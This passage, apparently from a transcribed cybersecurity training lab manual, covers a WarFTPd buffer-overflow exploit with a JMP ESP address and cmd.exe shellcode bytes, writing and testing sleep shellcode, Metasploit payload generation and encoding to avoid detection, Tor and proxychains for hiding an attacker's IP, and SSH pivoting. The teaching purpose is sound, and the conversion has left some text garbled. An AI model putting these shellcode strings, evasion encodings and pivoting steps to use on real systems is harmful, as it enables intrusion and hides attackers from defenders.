sure to be included in the program while executing. i.e some programs may have program

independent libraries that may not load all the time.

Here we choose to find the instruction from SHELL32.dll since it is always included for a program

that needs to be executed.

Click on the shell32.dll and look for the instruction JMP ESP. (To find an instruction use Ctrl + F

which opens the find box, enter the instruction you want to find and click on find.)

We have found the JMP ESP instruction at ―7C9D30D7‖

This is the address we want to place it in EIP.

Now, we have got all that we need, the next is to find a Shellcode that we can place it in our stack.

For the Shellcode, we will search exploit-db to get it. You can write your Shellcode and put it in, or

search other websites of your interest to get the Shellcode.

In this example since we have limit of 72 bytes, we will look for a Shellcode that is less than 72

bytes.


97

Exploit gave us some results on ―Windows XP‖,

We can see that there are different Shellcode with different sizes, we will choose the windows XP

SP3 cmd.exe (26 bytes) since this machine is SP3 and we have not more that 72 bytes.

This is the cmd.exe Shellcode that when run a calculator program in our warftpd.

We will modify our perl ftp login script to fit our JMP ESP and our Shellcode.

Execute the perl script and see the windows command prompt open up.

"\x8b\xec\x55\x8b\xec\x68\x65\x78\x65\x2F\x68\x63\x6d\x64\x2e".

"\x8d\x45\xf8\x50\xb8\xc7\x93\xc2\x77\xff\xd0"


98

Writing Shellcode:


Understand Shellcode creation

Create a simple Shellcode

Understand opcodes and hex conversions of binary file.

Description: The code when executed in a machine pawns a shell giving access to possibly

a remote user/attacker.

It is a single continuous string of characters that can be sent as a payload to an exploit for

attacking a machine.

In this demo we will be using a simple sleep function Shellcode which sleeps for given time and

exits.

For this to execute, we have to first find the address of ―sleep‖ function in one of the windows

libraries.

We have an excellent program called dllexportviewer.exe to find any functions address


99

Writing the Shellcode:

Steps:

Compile the given assembly code

#nasm -f bin -o sleep.bin sleep.asm

Obtaining the opcodes using xxd tool

# xxd -isleep.bin

0x31, 0xc0, 0xbb, 0x42, 0x24, 0x80, 0x7c, 0x66, 0xb8, 0x88, 0x13, 0x50,

0xff, 0xd3

Format it according to the following output by using xxd-shellcode.sh

[SECTION .text]

BITS 32 global _start _start:

xoreax,eax movebx, 0x7c802442

mov ax, 5000

pusheax


100

# ./xxd-shellcode.sh sleep.bin

\x31\xc0\xbb\x42\x24\x80\x7c\x66\xb8\x88\x13\x50\xff\xd3

Testing the Shellcode

Compile the generated Shellcode, using the beside program as a template.

Compile the program.

# gcc -o shellcodetestshellcodetest.c

Test the shellcode.

# ./shellcodetest.exe

(sleeps for 5 seconds) (then exits - and may core dump)

The Shellcode string generated should not contain null bytes as it will terminate the program

abruptly.

Avoiding Null Bytes:

Use XOR opcode to nullify variables when needed.

Use AL,BL,CL,DL registers when 32 bits are not needed.

/* shellcodetest.c Shellcode template*/

char code[] = “\x31\xc0\xbb\x42\x24\x80\x7c\x66\xb8\x88\x13\x50\xff\xd3” ;

int main(intargc, char **argv) { int (*func)(); func = (int (*)()) code; (int)(*func)(); }


101

Metasploit:

The Metasploit Framework is a development platform for creating security tools and exploits.

Developed by HD Moore <[email protected]>

The framework is written in the Ruby programming language.

Components of Metasploit:

Exploits

◦ Defined as modules that use payloads.

Payloads

◦ Payloads consist of code that runs remotely.

Auxiliaries

◦ Exploits without payloads are called auxiliaries.

Encoders

◦ Encoders ensure that payloads make it to their destination

Nops

◦ Nops keep the payload sizes consistent.

Metasploit User interfaces.

Armitage:

• Armitage is a graphical cyber attack management tool for Metasploit that visualizes

your targets, recommends exploits, and exposes the advanced capabilities of the

framework.

• For those who are not comfortable with using command-line interface.

• Valuable for managing remote Metasploit instances and collaboration


102

Other Interfaces.

Msfweb:

◦ Launches a http server and makes available the framework that can be controlled by a

web application.

Msfcli:

◦ Command-line interface which looks like command prompt.

◦ For those who like CMD.exe

MsfConsole:

◦ Console which looks more like bash shell.

◦ Has a neat formatting.

◦ Easy to use.

◦ Will be learning Metasploit in MSFCONSOLE.

Launching the MsfConsole.

◦ Windows: Start->All Programs->Metasploit->msfconsole.

◦ Backtrack: Open your favorite shell and type msfconsole.

Booting up the framework.

Start with msfconsole –h which shows all the commands that can be used in in this

console.

A Console Cheat Sheet

Use <module> -start configuring module

Show <options> -show configurable options

Set <varname><value> -set an option

Exploit -launch exploit module

Run -launch non-exploit module(auxilary)

Sessions -i <n> -interact with a ―n‖ session.

Help<command> -get help for a command.

Msfencode and msfpayload are the two features of Metasploit which offer writing of custom

exploits.

Msfpayload generates the necessary code for the exploit, while

Msfencode encodes it to keep undetectable from protections.

msfencode –h : Display the help file of msfencode

msfencode –l : Lists the available encoders

msfencode -t (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war, macho):

Format to display the encoded buffer

msfencode -ipayload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe:

Uses the shikata_ga_nai encoder to encode the payload.raw 5 times and exports it to a file

called encoded_payload.exe

Using Metasploit payload generators:

msfpayload is a command-line instance of Metasploit that is used to generate and output

all of the various types of shellcode that are available in Metasploit. The most common

use of this tool is for the generation of shellcode for an exploit that is not currently in the

Metasploit Framework or for testing different types of shellcode and options before

finalizing a module.


103

This tool has many different options and variables available to it, but they may not all be

fully realized given the limited output in the help banner.

These tools can be used to generate Shellcode for any of the following programs.

The list can be further update or synced with exploit-db.

Once you have selected a payload, there are two switches that are used most often when

crafting the payload for the exploit you are creating.

In the example below we have selected a simple Windows bind shell. When we add the

command-line argument "O" with that payload, we get all of the available configurable

options for that payload.


104

• As we can see from the output, we can configure three different options with this specific

payload, if they are required, if they come with any default settings, and a short

description:

EXITFUNC

◦ Required

◦ Default setting: process

LPORT

◦ Required

◦ Default setting: 4444

RHOST

◦ Not required

◦ No default setting

Setting these options in msfpayload is very simple. An example is shown below of

changing the exit technique and listening port of the shell:


105

Now that all of that is configured, the only option left is to specify the output type such as

C, Perl, Raw, etc.

For this example we are going to output our Shellcode to perl:

Exercises:

o Generate Shellcode for VNC inject using msfpayload.

o Write a simple program in C which uses the above generated Shellcode as payload.


106


107

Proxies and Tunneling Techniques


Hide your IP address in an attack. Tunnel through SSH and HTTP protocols.

Proxies

Description: Proxy is an intermediate software/device which forwards packets from one system to another hiding the true identity of the user.

Since the end system can only see the packet coming from previous system, it would be difficult to trace out directly where the original packet originated.

Types of Proxies:

Tunneling Proxy: A proxy server that passes requests and responses unmodified is usually called a gateway or sometimes tunneling proxy.

Forward Proxy:A forward proxy is an Internet-facing proxy used to retrieve from a wide range of sources (in most cases anywhere on the Internet).

Reverse Proxy: A reverse proxy is (usually) an Internet-facing proxy used as a front-end to control and protect access to a server on a private network, commonly also performing tasks such as load-balancing, authentication, decryption or caching.

Protocols Supported:

HTTP

SSL

FTP

SOCKS

TOR:

Tor is onion router which routes packets across many systems before reaching the end system. These layers or systems form layers like the ones you see on onion, so the name onion router. These systems are mostly users of internet acting like intermediate systems.

To work with tor, there are binary packages available for browsers like vadalia. However the preferred way is to install the tor is as a service which opens a port on 9050 to

which any software can be connected to.


108

Instructions for installing and usage:

To install tor as a service under linux (Debianflavours) Backtrack does not have the service tor installed and is also not available from the

repositories With a little configuration we can add tor service very easily. Open /etc/apt/sources.list and append the line

deb http://deb.torproject.org/torproject.org lucid main Hit apt-get update in the command line

root@bt:~# apt-get update root@bt:~# apt-get install tor Start the service by command ‘service’ root@bt:~# service tor start Confirm the tor service status by using netstat command

To stop tor root@bt:~# service tor stop Also install proxychains which is a proxy tool that ensure the packets are routed through

many systems before reaching the target system root@bt:~# apt-get installproxychains proxychains usage:


109

Example:

System IP before proxy chains

Ip address after using proxy chains:


110

Pivoting (SSH tunneling)

Description: Pivoting is a concept of tunneling into machines where the user may not have a direct access to other systems in a network.

For example, the attacker (IP: 117.139.142.191) has attacked a system (IP:

49.230.123.123)say a web server, which is further connected to a local network with the IP range 10.42.43.1 – 10.42.43.100 where local services or possibly load balancers may be running.

The attacker cannot access the machines in the local network due to firewall

configurations. However since the attacker has successfully attacked the web server having public access, he may be able to access other machines through the web server (IP: 49.230.123.123).

Instructions for SSH pivoting:

Since we have SSH access to the web server, we can use SSH port forwarding to use it as our pivot. We run the following command on our attacking machine:

This will establish a connection from our local system (127.0.0.1) from the port 4444 to

10.42.43.1at port 4444 through the webserver (IP:49.230.123.123)

Exercises:

1. By using tor and proxychains, scan a system with NMAP and test if indeed the attacker’s machine is hidden.

2. Configure the native browser to connect to o SOCKS proxy (TOR or online proxies) o HTTP proxies

Document the findings and configuration steps.

ssh -L 127.0.0.1:4444:10.42.43.1:[email protected]

mailto:user@

St. Angelo‘s Professional Education Lab Manual v1114.79.143.8/studentdesk/Download/Cyber Security...

Documents

Transcript of St. Angelo‘s Professional Education Lab Manual v1114.79.143.8/studentdesk/Download/Cyber Security...